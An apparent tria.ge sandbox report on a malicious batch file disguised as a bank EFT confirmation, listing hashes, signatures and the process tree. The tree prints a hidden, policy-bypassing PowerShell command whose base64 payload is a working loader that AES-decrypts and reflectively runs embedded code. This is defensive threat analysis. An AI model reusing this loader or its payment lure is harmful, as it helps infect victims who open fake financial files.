Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01/03/2025, 00:35

General

  • Target

    Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat

  • Size

    62KB

  • MD5

    4e49fd9891d84a4dff53559ce3fb1e4c

  • SHA1

    6b44eb8513213887a7cf7a21a2ef75472fb32bcf

  • SHA256

    6036593430cc74f68abc87c13469083968dc94f011d12c50c845c1a44751e409

  • SHA512

    feced2549a5da4ab69077b37a9cbf88824edc010cd8163025556c8c0c810b7599c1f982556bc613fa1cceee6467f2d89ad72ae467346546e4f848a4b62db2626

  • SSDEEP

    1536:5ImZkbmEKUgXEXzICKUnFCtb4+tD3Ezpaljp228c+:5I3Hfctb4UD3EzpVBc+

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2716
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskZ2tveXQgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGdrb3l0KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRna295dCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRna295dCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkZ2tveXQiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZGl1bnooJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2xMYlE3dHpsWjVlRE4wNlpIQzVkTVJpYXFLcnc0dTU5bGhoTTh2cDlZRGc9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0hpY09vTElUU3hiVDB6aUlXK2JOUWc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHV4bW4oJHBhcmFtX3Zhcil7CSR0c3ZicT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkcXB5bHY9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkcWt0d3Q9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkdHN2YnEsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHFrdHd0LkNvcHlUbygkcXB5bHYpOwkkcWt0d3QuRGlzcG9zZSgpOwkkdHN2YnEuRGlzcG9zZSgpOwkkcXB5bHYuRGlzcG9zZSgpOwkkcXB5bHYuVG9BcnJheSgpO31mdW5jdGlvbiB1b2dlZSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHZycG9sPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGRrcnluPSR2cnBvbC5FbnRyeVBvaW50OwkkZGtyeW4uSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGdrb3l0OyR6b2J2aD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGdrb3l0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkbnZmIGluICR6b2J2aCkgewlpZiAoJG52Zi5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHducXNhPSRudmYuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGl4bXd2PVtzdHJpbmdbXV0kd25xc2EuU3BsaXQoJ1wnKTskdXl4ZHE9aHV4bW4gKGRpdW56IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGl4bXd2WzBdKSkpOyR4eGp4aD1odXhtbiAoZGl1bnogKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkaXhtd3ZbMV0pKSk7dW9nZWUgJHV5eGRxICRudWxsO3VvZ2VlICR4eGp4aCAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2792

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2792-6-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

    Filesize

    4KB

  • memory/2792-7-0x000000001B850000-0x000000001BB32000-memory.dmp

    Filesize

    2.9MB

  • memory/2792-8-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-11-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-10-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-9-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

  • memory/2792-12-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-13-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-14-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB